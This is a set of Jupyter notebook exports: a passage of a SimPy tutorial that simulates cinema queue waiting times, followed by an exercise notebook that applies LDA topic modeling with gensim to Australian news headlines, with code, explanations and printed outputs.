variable to declare in the class is the `num_staff`, which is vital to the results of waiting time. ###Code class Cinema(object): def __init__(self, env, num_staff): self.env = env self.staff = simpy.Resource(env, num_staff) ###Output _____no_output_____ ###Markdown We know that purchasing a ticket is going to take a certain amount of time, so either use historical data for this, or provide an estimate for this process time. This time can be a range, since the size of the party could be different. In this example we will estimate that it takes between 1 and 3 minutes to buy a ticket.We will use the `timeout` method from SimPy to mimic this behaviour. ###Code class Cinema(object): def __init__(self, env, num_staff): self.env = env self.staff = simpy.Resource(env, num_staff) # customer must be passed as a parameter, since they cause the event to occur. def purchase_ticket(self, customer): yield self.env.timeout(random.randint(1,3)) ###Output _____no_output_____ ###Markdown Declare two more resources: - Staff to check tickets - Staff to serve food/drinksThese two tasks take a different amount of time, so as before either use historical data, or provide a best guess. ###Code class Cinema(object): def __init__(self, env, num_staff, num_checkers, num_servers): self.env = env self.staff = simpy.Resource(env, num_staff) # ticket checker self.checker = simpy.Resource(env, num_checkers) # food/drinks server self.server = simpy.Resource(env, num_servers) # customer must be passed as a parameter, since they cause the event to occur. def purchase_ticket(self, customer): # process of a customer buying a ticket yield self.env.timeout(random.randint(1, 3)) def check_ticket(self, customer): # process of a member of staff checking a ticket # this is defined as 3 seconds, don't need a random number yield self.env.timeout(3/60) def sell_food(self, customer): # process of staff selling food yield self.env.timeout(random.randint(1, 5)) ###Output _____no_output_____ ###Markdown Define the functionThe environment has been setup by the class above, with the resources and processes defined. All that is left is for a customer to enter the process.In the process terms, they will:- arrive at the venue- request a resource- wait for the process to complete- leaveCreate a function to simulate this process ###Code def go_to_cinema(env, customer, cinema): # customer will be controlled by the environment, so passed into first param # varaible customer tracks each person moving through the system # final parameter allows us to access the processes defined in the Cinema class # define the arrival time as a store to see when the customers arrive arrival_time = env.now ###Output _____no_output_____ ###Markdown Each of the processes from the Cinema should have corresponding requests in `go_to_cinema()`.The first process in the class is `purchase_ticket()`, using a `staff` resource. Below is a summary of the processes in the `cinema`, and the request made in the `go_to_cinema` method. | Process in cinema | Request in `go_to_cinema()`|| ------------- |:-------------:| | `purchase_ticket()` | request a member of `staff` | | `check_ticket()` | request a `checker`| | `sell_food()` | request a `server`| A member of `staff` is a shared resource in the process, so a customer can use the same member of staff, but this member of staff can only help one customer at a time. This needs to be accounted for. ###Code def go_to_cinema(env, customer, cinema): # customer will be controlled by the environment, so passed into first param # varaible customer tracks each person moving through the system # final parameter allows us to access the processes defined in the Cinema class # define the arrival time as a store to see when the customers arrive arrival_time = env.now with cinema.staff.request() as request: yield request yield env.process(cinema.purchase_ticket(customer)) ###Output _____no_output_____ ###Markdown For the above, we see:- `cinema.staff.request()`: the customer causes a request to call a member of staff, using a `staff` resource- `yield request`: customer waits for a `staff` to become available if all are currently in use- `yield env.process()`: the customer uses an available member of `staff` to complete the given process, in this case to purchase the ticket using the class method `cinema.purchase_ticket()`. Once the member of staff is then freed up, the `customer` will spend time buying their ticket. `env.process()` tells the simulation to go to the `Cinema` instance and run the `purchase_ticket()` process on the `customer`.The customer will repeat the **request, use, release** cycle to get their ticket checked. ###Code def go_to_cinema(env, customer, cinema): # customer will be controlled by the environment, so passed into first param # varaible customer tracks each person moving through the system # final parameter allows us to access the processes defined in the Cinema class # define the arrival time as a store to see when the customers arrive arrival_time = env.now with cinema.staff.request() as request: yield request yield env.process(cinema.purchase_ticket(customer)) with cinema.checker.request() as request: yield request yield env.process(cinema.check_ticket(customer)) ###Output _____no_output_____ ###Markdown The next part is to add the optional step of buying food/drinks, which is quite random, and we can add the randomness to the function ###Code def go_to_cinema(env, customer, cinema): # customer will be controlled by the environment, so passed into first param # varaible customer tracks each person moving through the system # final parameter allows us to access the processes defined in the Cinema class # define the arrival time as a store to see when the customers arrive arrival_time = env.now with cinema.staff.request() as request: yield request yield env.process(cinema.purchase_ticket(customer)) with cinema.checker.request() as request: yield request yield env.process(cinema.check_ticket(customer)) if random.choice([True, False]): # here the outcome could either be that they go and buy food, # or they simply go straight to their seat with cinema.staff.request() as request: yield request yield env.process(cinema.sell_food(customer)) waiting_times.append(env.now - arrival_time) ###Output _____no_output_____ ###Markdown Here, `env.now` will give the time at which the customer has finished all the processes and made it to their seat, so we add the overall time to the `waiting_times` list. Define a function to run the simulation, `run_cinema()` is responsible for creating an instance of the cinema, and generating customers until the simulation stops.We start the simulation with a few customers waiting at the cinema, as they might be there as soon as the box office opens. Then, customers will arrive in a certain timeframe, which we can guess will be on average every 12 seconds, so we will tell the function to wait this long before generating a new customer. ###Code def run_cinema(env, num_staff, num_checkers, num_servers): cinema = Cinema(env, num_staff, num_checkers, num_servers) for customer in range(3): # this will tell the simulation to move the customers through the cinema env.process(go_to_cinema(env, customer, cinema)) while True: yield env.timeout(0.2) # waiting time before a new customer comes # increment the customer by 1, and generate the next person customer += 1 env.process(go_to_cinema(env, customer, cinema)) ###Output _____no_output_____ ###Markdown To calculate the wait time, we have a list of waiting times (time taken for each customer to make it to their seat) `waiting_times`. Take the average to get the average wait time.Define a function to do this ###Code def calculate_wait_time(waiting_times): average_wait = statistics.mean(waiting_times) # pretty print results minutes, frac_mins = divmod(average_wait, 1) seconds = frac_mins * 60 return round(minutes), round(seconds) ###Output _____no_output_____ ###Markdown Specify a user input function to define the number of staff that will be working, in the roles of staff (`num_staff`), checkers (`num_checkers`) and servers (`num_servers`). We would like to change the above variables to see how the simulation changes. If a popular film has many customers lining up outside, how many people should be in the staff to sell the tickets? Will there be big queues of people waiting for food/drink? What value for `num_servers` will help ease the flow? Create a helper function for the user to change the values of the above parameters to try different scenarios. ###Code def get_user_input(): num_staff = input("Input # staff working:") num_checkers = input("Input # checkers working:") num_servers = input("Input # servers working:") params = [num_staff, num_checkers, num_servers] if all(str(i).isdigit() for i in params): params = [int(x) for x in params] else: print("Couldn't parse input. Simulation will use default values of \n" "1 for staff, checker and server") params = [1, 1, 1] return params ###Output _____no_output_____ ###Markdown Now we will create the final function, `main()`, which ensures the script runs in proper order when you execute it in the command line. ###Code def main(): random.seed(42) num_staff, num_checkers, num_servers = get_user_input() env = simpy.Environment() env.process(run_cinema(env, num_staff, num_checkers, num_servers)) env.run(until=90) # print(waiting_times) mins, secs = calculate_wait_time(waiting_times) print(f"Running simulation... \n" f"The average wait time is {mins} minutes and {secs} seconds") ###Output _____no_output_____ ###Markdown Let's look at an overview of all of the functions and classes we have:- `Cinema`: class and blueprint for the environment to simulate. Contains information such as what resources are available, and what the processes are- `go_to_cinema`: this function makes a request to use a resource, goes through the full process, and then releases it to next customer- `run_cinema`: this controls the simulation. Using the `Cinema` class blueprint to create an instance of the cinema, and then it calls `go_to_cinema` to generate and move people through the cinema- `get_average_wait_time`: Function to find average time it takes someone to go through the cinema- `calculate_wait_time`: ensure the final output is easy to read. Run the simulationNow let's run the simulation by inputing the values requested. Running it with different values, we can see how the wait time can be reduced. ###Code main() main() main() main() main() main() ###Output Input # staff working:30 Input # checkers working:10 Input # servers working:20 Running simulation... The average wait time is 12 minutes and 58 seconds
Exercises/topic-modeling/Latent_dirichlet_allocation.ipynb
###Markdown Step 0: Latent Dirichlet Allocation LDA is used to classify text in a document to a particular topic. It builds a topic per document model and words per topic model, modeled as Dirichlet distributions. * Each document is modeled as a multinomial distribution of topics and each topic is modeled as a multinomial distribution of words.* LDA assumes that the every chunk of text we feed into it will contain words that are somehow related. Therefore choosing the right corpus of data is crucial. * It also assumes documents are produced from a mixture of topics. Those topics then generate words based on their probability distribution. Step 1: Load the datasetThe dataset we'll use is a list of over one million news headlines published over a period of 15 years. We'll start by loading it from the `abcnews-date-text.csv` file. ###Code ''' Load the dataset from the CSV and save it to 'data_text' ''' import pandas as pd data = pd.read_csv('abcnews-date-text.csv', error_bad_lines=False); # We only need the Headlines text column from the data data_text = data[:300000][['headline_text']]; data_text['index'] = data_text.index documents = data_text ###Output _____no_output_____ ###Markdown Let's glance at the dataset: ###Code ''' Get the total number of documents ''' print(len(documents)) documents[:5] ###Output _____no_output_____ ###Markdown Step 2: Data Preprocessing We will perform the following steps:* **Tokenization**: Split the text into sentences and the sentences into words. Lowercase the words and remove punctuation.* Words that have fewer than 3 characters are removed.* All **stopwords** are removed.* Words are **lemmatized** - words in third person are changed to first person and verbs in past and future tenses are changed into present.* Words are **stemmed** - words are reduced to their root form. ###Code ''' Loading Gensim and nltk libraries ''' # pip install gensim import gensim from gensim.utils import simple_preprocess from gensim.parsing.preprocessing import STOPWORDS from nltk.stem import WordNetLemmatizer, SnowballStemmer from nltk.stem.porter import * import numpy as np np.random.seed(400) import nltk nltk.download('wordnet') ###Output [nltk_data] Downloading package wordnet to /root/nltk_data... [nltk_data] Unzipping corpora/wordnet.zip. ###Markdown Lemmatizer ExampleBefore preprocessing our dataset, let's first look at an lemmatizing example. What would be the output if we lemmatized the word 'went': ###Code print(WordNetLemmatizer().lemmatize('went', pos = 'v')) # past tense to present tense ###Output go ###Markdown Stemmer ExampleLet's also look at a stemming example. Let's throw a number of words at the stemmer and see how it deals with each one: ###Code stemmer = SnowballStemmer("english") original_words = ['caresses', 'flies', 'dies', 'mules', 'denied','died', 'agreed', 'owned', 'humbled', 'sized','meeting', 'stating', 'siezing', 'itemization','sensational', 'traditional', 'reference', 'colonizer','plotted'] singles = [stemmer.stem(plural) for plural in original_words] pd.DataFrame(data={'original word':original_words, 'stemmed':singles }) ''' Write a function to perform the pre processing steps on the entire dataset ''' def lemmatize_stemming(text): return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v')) # Tokenize and lemmatize def preprocess(text): #result=[] #for token in gensim.utils.simple_preprocess(text) : # if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3: # TODO: Apply lemmatize_stemming() on the token, then add to the results list # result.append(lemmatize_stemming(token)) result = [ lemmatize_stemming(token) for token in gensim.utils.simple_preprocess(text) if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3 ] return result ''' Preview a document after preprocessing ''' document_num = 4310 doc_sample = documents[documents['index'] == document_num].values[0][0] print("Original document: ") words = [] for word in doc_sample.split(' '): words.append(word) print(words) print("\n\nTokenized and lemmatized document: ") print(preprocess(doc_sample)) documents ###Output _____no_output_____ ###Markdown Let's now preprocess all the news headlines we have. To do that, let's use the [map](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.map.html) function from pandas to apply `preprocess()` to the `headline_text` column**Note**: This may take a few minutes (it take 6 minutes on my laptop) ###Code # TODO: preprocess all the headlines, saving the list of results as 'processed_docs' processed_docs = documents['headline_text'].map(lambda headline: preprocess(headline)) ''' Preview 'processed_docs' ''' processed_docs[:10] ###Output _____no_output_____ ###Markdown Step 3.1: Bag of words on the datasetNow let's create a dictionary from 'processed_docs' containing the number of times a word appears in the training set. To do that, let's pass `processed_docs` to [`gensim.corpora.Dictionary()`](https://radimrehurek.com/gensim/corpora/dictionary.html) and call it '`dictionary`'. ###Code ''' Create a dictionary from 'processed_docs' containing the number of times a word appears in the training set using gensim.corpora.Dictionary and call it 'dictionary' ''' dictionary = gensim.corpora.Dictionary(processed_docs) ''' Checking dictionary created ''' count = 0 for k, v in dictionary.iteritems(): print(k, v) count += 1 if count > 10: break ###Output 0 broadcast 1 communiti 2 decid 3 licenc 4 awar 5 defam 6 wit 7 call 8 infrastructur 9 protect 10 summit ###Markdown ** Gensim filter_extremes **[`filter_extremes(no_below=5, no_above=0.5, keep_n=100000)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.filter_extremes)Filter out tokens that appear in* less than no_below documents (absolute number) or* more than no_above documents (fraction of total corpus size, not absolute number).* after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None). ###Code ''' OPTIONAL STEP Remove very rare and very common words: - words appearing less than 15 times - words appearing in more than 10% of all documents ''' # TODO: apply dictionary.filter_extremes() with the parameters mentioned above dictionary.filter_extremes(no_below=15, no_above=0.1) dictionary.token2id ###Output _____no_output_____ ###Markdown ** Gensim doc2bow **[`doc2bow(document)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.doc2bow)* Convert document (a list of words) into the bag-of-words format = list of (token_id, token_count) 2-tuples. Each word is assumed to be a tokenized and normalized string (either unicode or utf8-encoded). No further preprocessing is done on the words in document; apply tokenization, stemming etc. before calling this method. ###Code ''' Create the Bag-of-words model for each document i.e for each document we create a dictionary reporting how many words and how many times those words appear. Save this to 'bow_corpus' ''' # TODO bow_corpus = list( map(lambda doc: dictionary.doc2bow(doc), processed_docs)) #bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs] ''' Checking Bag of Words corpus for our sample document --> (token_id, token_count) ''' print(processed_docs[document_num]) bow_corpus[document_num] ''' Preview BOW for our sample preprocessed document ''' # Here document_num is document number 4310 which we have checked in Step 2 bow_doc_4310 = bow_corpus[document_num] for i in range(len(bow_doc_4310)): print("Word {} (\"{}\") appears {} time.".format(bow_doc_4310[i][0], dictionary[bow_doc_4310[i][0]], bow_doc_4310[i][1])) ###Output Word 71 ("bushfir") appears 1 time. Word 107 ("help") appears 1 time. Word 462 ("rain") appears 1 time. Word 3530 ("dampen") appears 1 time. ###Markdown Step 3.2: TF-IDF on our document set While performing TF-IDF on the corpus is not necessary for LDA implemention using the gensim model, it is recemmended. TF-IDF expects a bag-of-words (integer values) training corpus during initialization. During transformation, it will take a vector and return another vector of the same dimensionality.*Please note: The author of Gensim dictates the standard procedure for LDA to be using the Bag of Words model.* ** TF-IDF stands for "Term Frequency, Inverse Document Frequency".*** It is a way to score the importance of words (or "terms") in a document based on how frequently they appear across multiple documents.* If a word appears frequently in a document, it's important. Give the word a high score. But if a word appears in many documents, it's not a unique identifier. Give the word a low score.* Therefore, common words like "the" and "for", which appear in many documents, will be scaled down. Words that appear frequently in a single document will be scaled up.In other words:* TF(w) = `(Number of times term w appears in a document) / (Total number of terms in the document)`.* IDF(w) = `log_e(Total number of documents / Number of documents with term w in it)`.** For example *** Consider a document containing `100` words wherein the word 'tiger' appears 3 times. * The term frequency (i.e., tf) for 'tiger' is then: - `TF = (3 / 100) = 0.03`. * Now, assume we have `10 million` documents and the word 'tiger' appears in `1000` of these. Then, the inverse document frequency (i.e., idf) is calculated as: - `IDF = log(10,000,000 / 1,000) = 4`. * Thus, the Tf-idf weight is the product of these quantities: - `TF-IDF = 0.03 * 4 = 0.12`. ###Code ''' Create tf-idf model object using models.TfidfModel on 'bow_corpus' and save it to 'tfidf' ''' from gensim import corpora, models # TODO tfidf = models.TfidfModel(bow_corpus) # fit a model tfidf ''' Apply transformation to the entire corpus and call it 'corpus_tfidf' ''' # TODO corpus_tfidf = tfidf[bow_corpus] # apply model to tbow_corpus corpus_tfidf ''' Preview TF-IDF scores for our first document --> --> (token_id, tfidf score) ''' from pprint import pprint for doc in corpus_tfidf: pprint(doc) break ###Output [(0, 0.5959813347777092), (1, 0.39204529549491984), (2, 0.48531419274988147), (3, 0.50554610985785686)] ###Markdown Step 4.1: Running LDA using Bag of Words We are going for 10 topics in the document corpus.** We will be running LDA using all CPU cores to parallelize and speed up model training.**Some of the parameters we will be tweaking are:* **num_topics** is the number of requested latent topics to be extracted from the training corpus.* **id2word** is a mapping from word ids (integers) to words (strings). It is used to determine the vocabulary size, as well as for debugging and topic printing.* **workers** is the number of extra processes to use for parallelization. Uses all available cores by default.* **alpha** and **eta** are hyperparameters that affect sparsity of the document-topic (theta) and topic-word (lambda) distributions. We will let these be the default values for now(default value is `1/num_topics`) - Alpha is the per document topic distribution. * High alpha: Every document has a mixture of all topics(documents appear similar to each other). * Low alpha: Every document has a mixture of very few topics - Eta is the per topic word distribution. * High eta: Each topic has a mixture of most words(topics appear similar to each other). * Low eta: Each topic has a mixture of few words.* ** passes ** is the number of training passes through the corpus. For example, if the training corpus has 50,000 documents, chunksize is 10,000, passes is 2, then online training is done in 10 updates: * `1 documents 0-9,999 ` * `2 documents 10,000-19,999 ` * `3 documents 20,000-29,999 ` * `4 documents 30,000-39,999 ` * `5 documents 40,000-49,999 ` * `6 documents 0-9,999 ` * `7 documents 10,000-19,999 ` * `8 documents 20,000-29,999 ` * `9 documents 30,000-39,999 ` * `10 documents 40,000-49,999` ###Code # LDA mono-core -- fallback code in case LdaMulticore throws an error on your machine # lda_model = gensim.models.LdaModel(bow_corpus, # num_topics = 10, # id2word = dictionary, # passes = 50) # LDA multicore ''' Train your lda model using gensim.models.LdaMulticore and save it to 'lda_model' ''' # TODO lda_model = gensim.models.LdaMulticore(bow_corpus, num_topics = 10, id2word = dictionary, passes = 2, workers = 2) ''' For each topic, we will explore the words occuring in that topic and its relative weight ''' for idx, topic in lda_model.print_topics(-1): print("Topic: {} \nWords: {}".format(topic, idx )) print("\n") ###Output Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash" Words: 0 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park" Words: 1 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall" Words: 2 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat" Words: 3 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust" Words: 4 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial" Words: 5 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit" Words: 6 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt" Words: 7 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise" Words: 8 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join" Words: 9 ###Markdown Classification of the topics Using the words in each topic and their corresponding weights, what categories were you able to infer?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 4.2 Running LDA using TF-IDF ###Code ''' Define lda model using corpus_tfidf, again using gensim.models.LdaMulticore() ''' # TODO lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf, num_topics = 10, id2word = dictionary, passes = 2, workers = 2) ''' For each topic, we will explore the words occuring in that topic and its relative weight ''' for idx, topic in lda_model_tfidf.print_topics(-1): print("Topic: {} Word: {}".format(idx, topic)) print("\n") ###Output Topic: 0 Word: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season" Topic: 1 Word: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign" Topic: 2 Word: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash" Topic: 3 Word: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg" Topic: 4 Word: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station" Topic: 5 Word: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit" Topic: 6 Word: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan" Topic: 7 Word: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti" Topic: 8 Word: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon" Topic: 9 Word: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack" ###Markdown Classification of the topics As we can see, when using tf-idf, heavier weights are given to words that are not as frequent which results in nouns being factored in. That makes it harder to figure out the categories as nouns can be hard to categorize. This goes to show that the models we apply depend on the type of corpus of text we are dealing with. Using the words in each topic and their corresponding weights, what categories could you find?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 5.1: Performance evaluation by classifying sample document using LDA Bag of Words modelWe will check to see where our test document would be classified. ###Code ''' Text of sample document 4310 ''' processed_docs[4310] ''' Check which topic our test document belongs to using the LDA Bag of Words model. ''' document_num = 4310 # Our test document is document number 4310 # TODO # Our test document is document number 4310 for index, score in sorted(lda_model[bow_corpus[document_num]], key=lambda tup: -1*tup[1]): print("\nScore: {}\t \nTopic: {}".format(score, lda_model.print_topic(index, 10))) ###Output Score: 0.553202748298645 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall" Score: 0.28677472472190857 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat" Score: 0.020009001716971397 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park" Score: 0.020004812628030777 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit" Score: 0.0200041513890028 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise" Score: 0.020001856610178947 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash" Score: 0.020001748576760292 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt" Score: 0.02000090852379799 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust" Score: 0.020000092685222626 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join" Score: 0.020000003278255463 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial" ###Markdown It has the highest probability (`x`) to be part of the topic that we assigned as X, which is the accurate classification. Step 5.2: Performance evaluation by classifying sample document using LDA TF-IDF model ###Code ''' Check which topic our test document belongs to using the LDA TF-IDF model. ''' # Our test document is document number 4310 for index, score in sorted(lda_model_tfidf[bow_corpus[document_num]], key=lambda tup: -1*tup[1]): print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 10))) ###Output Score: 0.8199763894081116 Topic: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan" Score: 0.020008740946650505 Topic: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash" Score: 0.020004352554678917 Topic: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti" Score: 0.02000252529978752 Topic: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit" Score: 0.0200019683688879 Topic: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg" Score: 0.020001957193017006 Topic: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station" Score: 0.020001888275146484 Topic: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack" Score: 0.020001139491796494 Topic: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign" Score: 0.020000556483864784 Topic: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon" Score: 0.020000483840703964 Topic: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season" ###Markdown It has the highest probability (`x%`) to be part of the topic that we assigned as X. Step 6: Testing model on unseen document ###Code unseen_document = "My favorite sports activities are running and swimming." # Data preprocessing step for the unseen document bow_vector = dictionary.doc2bow(preprocess(unseen_document)) for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1]): print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5))) ###Output Score: 0.4200000762939453 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" Score: 0.2199999839067459 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" Score: 0.2199920117855072 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" Score: 0.020004048943519592 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" Score: 0.02000385895371437 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" Score: 0.019999999552965164 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" Score: 0.019999999552965164 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" Score: 0.019999999552965164 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" Score: 0.019999999552965164 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" Score: 0.019999999552965164 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost"
Work in progress/cleaning_workbook.ipynb
